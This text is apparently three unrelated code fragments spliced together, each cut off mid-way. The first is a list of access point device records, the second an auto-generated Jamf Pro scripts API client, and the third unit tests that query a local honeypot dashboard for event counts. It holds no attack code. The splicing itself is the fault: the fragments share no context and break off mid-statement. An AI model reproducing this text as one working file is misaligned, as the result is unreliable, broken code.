"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22990
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:22"
},
{
"deviceId":13384,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22994
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:24"
},
{
"deviceId":13385,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22996
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:25"
},
{
"deviceId":13386,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22998
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:26"
},
{
"deviceId":13387,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23000
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:27"
},
{
"deviceId":13388,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23002
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:28"
},
{
"deviceId":13389,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23004
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:29"
},
{
"deviceId":13437,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23100
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:77"
},
{
"deviceId":13438,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23102
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:78"
},
{
"deviceId":13439,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23104
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:79"
},
{
"deviceId":13440,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23106
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:80"
},
{
"deviceId":13441,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23108
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:81"
},
{
"deviceId":13442,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23110
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:82"
},
{
"deviceId":13444,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23114
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:84"
},
{
"deviceId":13445,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23116
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:85"
},
{
"deviceId":13446,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23118
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:86"
},
{
"deviceId":13459,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23144
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:99"
},
{
"deviceId":13460,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23146
],
"topId":22962,
"mac":"A1:A1:A5:A1:D1:01"
},
{
"deviceId":13461,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23148
],
"topId":22965,
"mac":"A1:A1:A5:A1:D1:02"
},
{
"deviceId":13462,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23150
],
"topId":22968,
"mac":"A1:A1:A5:A1:D1:03"
},
{
"deviceId":13464,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22946
],
"topId":22944,
"mac":"A1:A1:A5:A1:D1:05"
},
{
"deviceId":13465,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22949
],
"topId":22947,
"mac":"A1:A1:A5:A1:D1:06"
},
{
"deviceId":13466,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22952
],
"topId":22950,
"mac":"A1:A1:A5:A1:D1:07"
},
{
"deviceId":13467,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22955
],
"topId":22953,
"mac":"A1:A1:A5:A1:D1:08"
},
{
"deviceId":13468,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22958
],
"topId":22956,
"mac":"A1:A1:A5:A1:D1:09"
},
{
"deviceId":13469,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22961
],
"topId":22959,
"mac":"A1:A1:A5:A1:D1:10"
},
{
"deviceId":13470,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22964
],
"topId":22962,
"mac":"A1:A1:A5:A1:D1:11"
},
{
"deviceId":13471,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22967
],
"topId":22965,
"mac":"A1:A1:A5:A1:D1:12"
},
{
"deviceId":13472,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22970
],
"topId":22968,
"mac":"A1:A1:A5:A1:D1:13"
},
{
"deviceId":13244,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:00",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23114
],
"topId":22944,
"mac":"A1:A1:A5:A1:A1:82"
},
{
"deviceId":13245,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23116
],
"topId":22947,
"mac":"A1:A1:A5:A1:A1:83"
},
{
"deviceId":13246,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23118
],
"topId":22950,
"mac":"A1:A1:A5:A1:A1:84"
},
{
"deviceId":13247,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23120
],
"topId":22953,
"mac":"A1:A1:A5:A1:A1:85"
},
{
"deviceId":13248,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23122
],
"topId":22956,
"mac":"A1:A1:A5:A1:A1:86"
},
{
"deviceId":13249,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23124
],
"topId":22959,
"mac":"A1:A1:A5:A1:A1:87"
},
{
"deviceId":13250,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23126
],
"topId":22962,
"mac":"A1:A1:A5:A1:A1:88"
},
{
"deviceId":13251,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23128
],
"topId":22965,
"mac":"A1:A1:A5:A1:A1:89"
},
{
"deviceId":13252,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23130
],
"topId":22968,
"mac":"A1:A1:A5:A1:A1:90"
},
{
"deviceId":13254,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23134
],
"topId":22944,
"mac":"A1:A1:A5:A1:A1:92"
},
{
"deviceId":13255,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23136
],
"topId":22947,
"mac":"A1:A1:A5:A1:A1:93"
},
{
"deviceId":13256,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23138
],
"topId":22950,
"mac":"A1:A1:A5:A1:A1:94"
},
{
"deviceId":13257,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23140
],
"topId":22953,
"mac":"A1:A1:A5:A1:A1:95"
},
{
"deviceId":13258,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:03",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23142
],
"topId":22956,
"mac":"A1:A1:A5:A1:A1:96"
},
{
"deviceId":13259,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:03",
"remark":"",
"isOnline":False,
| |
# coding: utf-8
"""
Jamf Pro API
## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used soley for documentation purposes. # noqa: E501
The version of the OpenAPI document: 10.25.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jamf.api_client import ApiClient
from jamf.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ScriptsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_scripts_get(self, **kwargs): # noqa: E501
"""Search for sorted and paged Scripts # noqa: E501
Search for sorted and paged scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_get(async_req=True)
>>> result = thread.get()
:param page:
:type page: int
:param page_size:
:type page_size: int
:param sort: Sorting criteria in the format: property:asc/desc. Default sort is name:asc. Multiple sort criteria are supported and must be separated with a comma. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. Example: sort=date:desc,name:asc
:type sort: list[str]
:param filter: Query in the RSQL format, allowing to filter scripts collection. Default search is empty query - returning all results for the requested page. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. This param can be combined with paging and sorting. Example: filter=categoryName==\"Category\" and name==\"*script name*\"
:type filter: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ScriptsSearchResults
"""
kwargs['_return_http_data_only'] = True
return self.v1_scripts_get_with_http_info(**kwargs) # noqa: E501
def v1_scripts_get_with_http_info(self, **kwargs): # noqa: E501
"""Search for sorted and paged Scripts # noqa: E501
Search for sorted and paged scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_get_with_http_info(async_req=True)
>>> result = thread.get()
:param page:
:type page: int
:param page_size:
:type page_size: int
:param sort: Sorting criteria in the format: property:asc/desc. Default sort is name:asc. Multiple sort criteria are supported and must be separated with a comma. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. Example: sort=date:desc,name:asc
:type sort: list[str]
:param filter: Query in the RSQL format, allowing to filter scripts collection. Default search is empty query - returning all results for the requested page. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. This param can be combined with paging and sorting. Example: filter=categoryName==\"Category\" and name==\"*script name*\"
:type filter: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ScriptsSearchResults, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'page',
'page_size',
'sort',
'filter'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_scripts_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] is not None: # noqa: E501
query_params.append(('page-size', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "ScriptsSearchResults",
}
return self.api_client.call_api(
'/v1/scripts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_scripts_id_delete(self, id, **kwargs): # noqa: E501
"""Delete a Script at the specified id # noqa: E501
Deletes a script at the specified id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_id_delete(id, async_req=True)
>>> result = thread.get()
:param id: Script object identifier (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_scripts_id_delete_with_http_info(id, **kwargs) # noqa: E501
def v1_scripts_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a Script at the specified id # noqa: E501
Deletes a script at the specified id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Script object identifier (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_scripts_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import requests
from core.get_modules import load_all_modules
API_URL = 'http://127.0.0.1:5000'
class TestApi(unittest.TestCase):
def test_index(self):
"""
Test if the API is running
"""
response = requests.get(API_URL)
self.assertEqual(response.status_code, 200)
def test_count_all_events(self):
response = requests.get(API_URL + "/api/events/count/all")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_honeypot_events(self):
response = requests.get(API_URL + "/api/events/count/honeypot")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_network_events(self):
response = requests.get(API_URL + "/api/events/count/network")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_credential_events(self):
response = requests.get(API_URL + "/api/events/count/credential")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_file_events(self):
response = requests.get(API_URL + "/api/events/count/file")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_data_events(self):
response = requests.get(API_URL + "/api/events/count/data")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
response = requests.get(API_URL + "/api/events/count/data?date=2020-08-14")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_top_ten_honeypot_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?country_ip_dest=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_network_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/network/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
